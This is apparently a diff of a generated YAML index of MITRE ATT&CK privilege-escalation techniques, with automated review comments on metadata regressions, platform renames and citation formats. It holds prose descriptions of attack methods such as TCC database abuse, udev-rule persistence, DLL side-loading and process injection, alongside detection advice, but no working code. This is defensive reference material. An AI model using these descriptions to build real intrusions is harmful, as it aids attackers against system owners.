x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -22708,7 +22993,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22752,8 +23037,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -22789,7 +23072,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22808,12 +23091,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22863,12 +23145,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -22901,9 +23182,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
@@ -22920,9 +23202,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -22968,38 +23249,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -23007,6 +23269,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23014,7 +23278,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23044,7 +23308,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
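Review bot: `spec_version: '2.1'` is dropped from the TCC Manipulation entry above, and the same removal is repeated for almost every entry in this patch, while `x_mitre_attack_spec_version` is retained. If anything downstream deserialises these technique blocks as STIX 2.1 objects, the STIX `spec_version` field now disappears, so confirm the regeneration source intentionally omits it rather than this being a generator regression.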
@@ -23090,7 +23353,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
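Review bot: the `modified` timestamp for Ptrace System Calls moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T12:26:31.766Z`, so the regenerated entry appears to come from an older upstream snapshot than the one previously indexed. The same backward move occurs for Logon Script (Windows), LSASS Driver, Netsh Helper DLL, Dylib Hijacking and COR_PROFILER further down; check that the generator is reading the intended ATT&CK release, or that upstream itself reset these timestamps, before merging.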
@@ -23135,8 +23398,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
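Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from the Ptrace System Calls entry with no replacement in this hunk, unlike the ListPlanting entry below, which gets `x_mitre_attack_spec_version: 3.2.0` re-added. Verify the field is set elsewhere in this entry; otherwise consumers keying on the attack spec version will see it vanish for this technique (the same pattern applies to Logon Script (Windows) and COR_PROFILER).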
@@ -23162,7 +23423,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23188,59 +23449,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
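Review bot: nearly all of this hunk is key reordering (platforms, domains, contributors, id, type, created and external_references are deleted here and re-added at the bottom of the entry in a later hunk), which buries the only substantive changes, the new `modified` date and the added `(Citation: Hexacorn Listplanting)`. If this index is machine-generated, emitting mapping keys in a stable order would keep future diffs reviewable.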
@@ -23257,6 +23487,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23271,21 +23504,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23330,9 +23594,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
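Review bot: `Azure AD` and `SaaS` are replaced by the single `Identity Provider` platform for Domain or Tenant Policy Modification; if any per-platform index or filter is derived from `x_mitre_platforms` using the old names, it needs regenerating in the same change or this technique will silently drop out of it.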
@@ -23389,8 +23652,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23399,7 +23662,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -23441,7 +23703,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23466,12 +23728,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23511,8 +23772,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -23520,13 +23783,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
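Review bot: `Azure AD`, `Office 365` and `Google Workspace` are removed from the Cloud Accounts platforms in favour of `Office Suite` and `Identity Provider`; anything keyed on the old platform names (platform-specific indexes, filters, tests tagged by platform) will no longer match this technique, so those consumers must be updated together with this bump to `1.8`.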
@@ -23557,17 +23820,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -23630,7 +23890,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -23664,8 +23924,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
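Review bot: the leoloobeek reference URL is rewritten from `twitter.com` to `x.com` with a new retrieved date; for a 2017 post, an archived `web.archive.org` link, as already used for the subt0x10 entry elsewhere in this file, would be more durable than following the domain rename. The same rewrite appears again in the Scheduled Task entry below.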
@@ -23674,6 +23934,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
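Review bot: the new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, a fragment that targets the page's subscription widget rather than the article; drop the fragment so the citation resolves to the post itself. The author is also recorded as `Philip Tsukerman. (n.d.)` while neighbouring entries use the `Surname, Initial. (Year, Month Day).` form.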
@@ -23686,7 +23950,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -23789,9 +24052,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1546.007:
technique:
x_mitre_platforms:
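Review bot: in the new Udev Rules entry, `x_mitre_detection` lists only `/etc/udev/rules.d/`, `/lib/udev/rules.d/` and `/usr/lib/udev/rules.d/` (the last without backticks, and the string ends in a trailing space), whereas the description names five rule directories including `/run/udev/rules.d/` and `/usr/local/lib/udev/rules.d/`; a file-monitoring rule built from the detection text alone would miss rules dropped into those two paths. The text mirrors upstream ATT&CK, so the fix belongs there, but it is worth flagging. The entry also lands with `atomic_tests: []`, so the index lists the technique without any test behind it.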
@@ -23827,7 +24148,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
